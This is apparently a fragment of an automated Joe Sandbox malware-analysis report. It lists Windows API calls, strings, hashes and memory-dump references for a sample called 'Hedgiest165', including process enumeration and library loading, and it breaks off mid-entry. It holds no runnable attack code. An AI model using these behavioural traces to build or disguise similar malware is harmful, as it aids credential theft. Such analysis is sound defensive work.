                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                        • String ID:
                                                                        • API String ID: 1125800050-0
                                                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                        • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleSleep
                                                                        • String ID: }A
                                                                        • API String ID: 252777609-2138825249
                                                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                        APIs
                                                                        • malloc.MSVCRT ref: 00409A10
                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                        • free.MSVCRT ref: 00409A31
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: freemallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 3056473165-0
                                                                        • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                        • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                        • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                        • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                        APIs
                                                                        Strings
                                                                        • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: realloc
                                                                        • String ID: failed memory resize %u to %u bytes
                                                                        • API String ID: 471065373-2134078882
                                                                        • Opcode ID: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                        • Instruction ID: fa0be88ae63bf8e7a0ec1cbb838f3bc130d20eb0a75070b99cf9e4f37552e13a
                                                                        • Opcode Fuzzy Hash: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                        • Instruction Fuzzy Hash: 6EF05CB3A01705E7D2109A55DC418CBF3DCDFC0755B06082FF998D3201E168E88083B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: c9d4ddf0e349a7fbf6246986bbb7506d625f4d109dcf7a3267b0342e0f581bf0
                                                                        • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                        • Opcode Fuzzy Hash: c9d4ddf0e349a7fbf6246986bbb7506d625f4d109dcf7a3267b0342e0f581bf0
                                                                        • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: BINARY
                                                                        • API String ID: 2221118986-907554435
                                                                        • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                        • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID: /stext
                                                                        • API String ID: 2081463915-3817206916
                                                                        • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                        • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 2445788494-0
                                                                        • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                        • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                        APIs
                                                                        Strings
                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: malloc
                                                                        • String ID: failed to allocate %u bytes of memory
                                                                        • API String ID: 2803490479-1168259600
                                                                        • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                        • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                        • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                        • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041BDDF
                                                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcmpmemset
                                                                        • String ID:
                                                                        • API String ID: 1065087418-0
                                                                        • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                        • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                        APIs
                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                        • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                        • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                        • String ID:
                                                                        • API String ID: 1381354015-0
                                                                        • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                        • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004301AD
                                                                        • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID:
                                                                        • API String ID: 1297977491-0
                                                                        • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                        • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                        • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                        • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free
                                                                        • String ID:
                                                                        • API String ID: 1294909896-0
                                                                        • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                        • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                        APIs
                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                        • String ID:
                                                                        • API String ID: 2154303073-0
                                                                        • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                        • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                        APIs
                                                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 3150196962-0
                                                                        • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                        • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                        • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                        • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                        APIs
                                                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$PointerRead
                                                                        • String ID:
                                                                        • API String ID: 3154509469-0
                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                        APIs
                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                        • String ID:
                                                                        • API String ID: 4232544981-0
                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                        APIs
                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                        Memory Dump Source
